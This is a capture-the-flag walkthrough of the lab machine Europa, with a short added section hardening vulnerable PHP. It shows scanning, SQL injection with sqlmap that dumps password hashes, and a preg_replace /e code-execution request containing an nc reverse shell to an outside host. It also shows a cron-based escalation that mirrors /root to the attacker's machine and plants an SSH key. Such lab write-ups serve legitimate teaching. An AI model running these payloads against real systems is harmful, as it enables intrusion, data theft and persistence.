[Meachines] [Medium] Europa SQLI+preg_replace-RCE+D-link file sync+cronjob privilege...
maptnh 2025-03-17 12:47:09 4081
Location: Fujian Province

Information Gathering

IP Address      Open Ports
10.10.10.22     TCP: 22, 80, 443

$ ip='10.10.10.22'; itf='tun0'
$ if nmap -Pn -sn "$ip" | grep -q "Host is up"; then
      echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
      # masscan over all TCP and UDP ports, collected as a comma-separated list
      ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" \
          | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
      if [ -n "$ports" ]; then
          echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
          # version and default-script scan limited to the ports masscan found
          nmap -Pn -sV -sC -p "$ports" "$ip"
      else
          echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
      fi
  else
      echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
  fi

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6b55420af7068c67c0e25c05db09fb78 (RSA)
|   256 b1ea5ec41c0a969e93db1dad22507475 (ECDSA)
|_  256 331f168dc024785f5bf56d7ff7b4f2e5 (ED25519)
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
| Not valid before: 2017-04-19T09:06:22
|_Not valid after:  2027-04-17T09:06:22
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

EuropaCorp Server Admin v0.2 beta SQLI

# echo '10.10.10.22 admin-portal.europacorp.htb europacorp.htb'>>/etc/hosts

https://admin-portal.europacorp.htb/login.php


$ sqlmap -r /tmp/sql.txt --force-ssl --batch


$ sqlmap -r /tmp/sql.txt --force-ssl --batch -D admin -T users --dump


+----+----------------------+----------+----------------------------------+---------------+
| id | email                | active   | password                         | username      |
+----+----------------------+----------+----------------------------------+---------------+
| 1  | admin@europacorp.htb | 1        | 2b6d315337f18617ba18922c0b9597ff | administrator |
| 2  | john@europacorp.htb  | 1        | 2b6d315337f18617ba18922c0b9597ff | john          |
+----+----------------------+----------+----------------------------------+---------------+


Plaintext of the hash shared by both users:

password: SuperSecretPassword!


preg_replace RCE

https://admin-portal.europacorp.htb/tools.php


In the pattern parameter, /ip_address/ is wrapped in two slashes, the usual notation for a regular expression, especially in languages such as JavaScript, PHP and Perl. That suggests the value is handed to preg_replace() as the pattern. On PHP 5.x the e modifier makes preg_replace() evaluate the replacement string (here the ipaddress parameter) as PHP code, which is what the request below does with pattern=/x/e.


POST /tools.php HTTP/1.1
Host: admin-portal.europacorp.htb
Cookie: PHPSESSID=c9u3dbpqf2974dt4tn7pn7uu07
Content-Length: 1707
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://admin-portal.europacorp.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://admin-portal.europacorp.htb/tools.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

pattern=%2Fx%2Fe&ipaddress=system("rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.10.16.33%20443%20%3E%2Ftmp%2Ff")&text=%22openvpn%22%3A+%7B%0D%0A++++++++%22vtun0%22%3A+%7B%0D%0A++++++++++++++++%22local-address%22%3A+%7B%0D%0A++++++++++++++++++++++++%2210.10.10.1%22%3A+%22%27%27%22%0D%0A++++++++++++++++%7D%2C%0D%0A++++++++++++++++%22local-port%22%3A+%221337%22%2C%0D%0A++++++++++++++++%22mode%22%3A+%22site-to-site%22%2C%0D%0A++++++++++++++++%22openvpn-option%22%3A+%5B%0D%0A++++++++++++++++++++++++%22--comp-lzo%22%2C%0D%0A++++++++++++++++++++++++%22--float%22%2C%0D%0A++++++++++++++++++++++++%22--ping+10%22%2C%0D%0A++++++++++++++++++++++++%22--ping-restart+20%22%2C%0D%0A++++++++++++++++++++++++%22--ping-timer-rem%22%2C%0D%0A++++++++++++++++++++++++%22--persist-tun%22%2C%0D%0A++++++++++++++++++++++++%22--persist-key%22%2C%0D%0A++++++++++++++++++++++++%22--user+nobody%22%2C%0D%0A++++++++++++++++++++++++%22--group+nogroup%22%0D%0A++++++++++++++++%5D%2C%0D%0A++++++++++++++++%22remote-address%22%3A+%22ip_address%22%2C%0D%0A++++++++++++++++%22remote-port%22%3A+%221337%22%2C%0D%0A++++++++++++++++%22shared-secret-key-file%22%3A+%22%2Fconfig%2Fauth%2Fsecret%22%0D%0A++++++++%7D%2C%0D%0A++++++++%22protocols%22%3A+%7B%0D%0A++++++++++++++++%22static%22%3A+%7B%0D%0A++++++++++++++++++++++++%22interface-route%22%3A+%7B%0D%0A++++++++++++++++++++++++++++++++%22ip_address%2F24%22%3A+%7B%0D%0A++++++++++++++++++++++++++++++++++++++++%22next-hop-interface%22%3A+%7B%0D%0A++++++++++++++++++++++++++++++++++++++++++++++++%22vtun0%22%3A+%22%27%27%22%0D%0A++++++++++++++++++++++++++++++++++++++++%7D%0D%0A++++++++++++++++++++++++++++++++%7D%0D%0A++++++++++++++++++++++++%7D%0D%0A++++++++++++++++%7D%0D%0A++++++++%7D%0D%0A%7D%0D%0A++++++++++++++++++++++++++++++++
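To show why a request-controlled pattern is the root cause here, the following is an added illustration and not the box's tools.php (its source is not on the page): a hypothetical handler that passes the form's pattern straight to preg_replace(), next to two hardened versions that never compile request data into a regex and never evaluate the replacement as code. Function names, the sample template fragment and the malicious sample are assumptions constructed for the example.

```php
<?php
// Added example, not the Europa machine's tools.php (its source is not on the page).
// Each handler takes the same three form fields the request above uses:
// pattern, ipaddress, text.

// Vulnerable shape: the request supplies the regex itself. On PHP 5.x a pattern
// such as "/x/e" makes preg_replace() eval() the replacement string, so whatever
// is in $post['ipaddress'] runs as PHP code. PHP 7.0 removed the e modifier, so
// there the same input only produces an "Unknown modifier" warning.
function render_config_vulnerable(array $post): string
{
    return preg_replace($post['pattern'], $post['ipaddress'], $post['text']);
}

// Hardened shape: the placeholder is a fixed literal, the user supplies only the
// value, and the value must be a valid IP address before it is used.
// No regex is built from request data and nothing is ever evaluated.
function render_config_hardened(array $post): string
{
    $ip = filter_var($post['ipaddress'] ?? '', FILTER_VALIDATE_IP);
    if ($ip === false) {
        throw new InvalidArgumentException('ipaddress must be a valid IP address');
    }
    return str_replace('ip_address', $ip, $post['text'] ?? '');
}

// If a regex replacement is genuinely needed, preg_replace_callback() with a
// fixed pattern keeps the replacement as data returned by a closure, not code.
function render_config_callback(array $post): string
{
    $ip = filter_var($post['ipaddress'] ?? '', FILTER_VALIDATE_IP);
    if ($ip === false) {
        throw new InvalidArgumentException('ipaddress must be a valid IP address');
    }
    return preg_replace_callback('/\bip_address\b/', function ($m) use ($ip) {
        return $ip;
    }, $post['text'] ?? '');
}

// Constructed benign input, shaped like the page's OpenVPN template fragment.
$sample = [
    'pattern'   => '/ip_address/',
    'ipaddress' => '10.10.10.22',
    'text'      => '"remote-address": "ip_address", "interface-route": { "ip_address/24": {} }',
];
echo render_config_hardened($sample), PHP_EOL;
echo render_config_callback($sample), PHP_EOL;

// Constructed input of the shape shown in the request above: the hardened
// handler rejects it at validation instead of ever reaching a regex engine.
$malicious = [
    'pattern'   => '/x/e',
    'ipaddress' => 'system("id")',
    'text'      => 'x',
];
try {
    render_config_hardened($malicious);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The fix is not only the IP validation: the decisive change is that the pattern no longer comes from the request, so the caller cannot choose modifiers at all. Running a web application on a PHP 5.x runtime keeps the e modifier available to any code path that builds a pattern from user input, which is a second reason to treat the PHP version itself as a finding.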


username: john
password: iEOERHRiDnwkdnw

User.txt

ac3f97350181a4632c3395550968fb9b

Privilege Escalation: cronjobs && D-link Sync


File sync

https://github.com/MartinxMax/dlink

Attacker machine:

$ ./dlink server --port 10098 --path /tmp/root & ./dlink server --port 10099 --path /tmp/root --reverse


Target machine:

$ echo -e '#!/bin/bash\n\n/tmp/dlink client --endpoint "10.10.16.33:10098" --path /root & \n/tmp/dlink client --endpoint "10.10.16.33:10099" --path /root --reverse' > /var/www/cmd/logcleared.sh;chmod +x /var/www/cmd/logcleared.sh


The file sync is working...
Back on the attacker machine, /tmp/root is now a mirror of the target's /root directory...


$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHW/AdC4GrFM0XNoi5DrRrmUCSfp5EE439+ay1c2JIQq maptnh@maptnh-H4CK13'>/tmp/root/.ssh/authorized_keys


Root.txt

14fea16f907013662508670e9efc16e5

# Web security # CTF